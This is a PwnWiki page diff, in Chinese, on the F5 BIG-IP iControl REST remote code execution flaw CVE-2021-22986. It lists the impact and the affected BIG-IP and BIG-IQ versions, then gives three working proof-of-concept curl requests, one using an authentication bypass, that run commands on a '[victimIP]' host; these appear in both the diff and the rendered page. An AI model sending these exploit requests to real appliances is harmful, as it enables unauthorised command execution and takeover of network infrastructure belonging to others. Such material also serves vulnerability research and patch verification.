Difference between revisions of "CVE-2021-22986 F5 BIG-IP iControl RCE漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞危害== </translate> <translate> *執行任意系統命令 *創建或刪除文件 *禁用服務 </translate> <translate> ==影響版...") |
|||
| (One intermediate revision by the same user not shown) | |||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞危害== | + | ==漏洞危害== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
*執行任意系統命令 | *執行任意系統命令 | ||
*創建或刪除文件 | *創建或刪除文件 | ||
| Line 12: | Line 13: | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:3--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 27: | Line 28: | ||
==POC== | ==POC== | ||
| + | 1. | ||
<pre> | <pre> | ||
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}' | curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}' | ||
| + | </pre> | ||
| + | 2. | ||
| + | <pre> | ||
| + | curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}' | ||
| + | </pre> | ||
| + | 3. | ||
| + | <pre> | ||
| + | curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}' | ||
</pre> | </pre> | ||
Latest revision as of 17:31, 18 March 2021
漏洞危害
- 執行任意系統命令
- 創建或刪除文件
- 禁用服務
影響版本
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 16.x 16.0.0 – 16.0.1 16.0.1.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 15.x 15.1.0 – 15.1.2 15.1.2.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 14.x 14.1.0 – 14.1.3 14.1.4 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 13.x 13.1.0 – 13.1.3 13.1.3.6 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 12.x 12.1.0 – 12.1.5 12.1.5.3* BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 11.x None Not applicable BIG-IQ Centralized Management 8.x None 8.0.0 BIG-IQ Centralized Management 7.x 7.1.0, 7.0.0 7.1.0.3, 7.0.0.2 BIG-IQ Centralized Management 6.x 6.0.0 – 6.1.0 None
POC
1.
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
2.
curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'
3.
curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
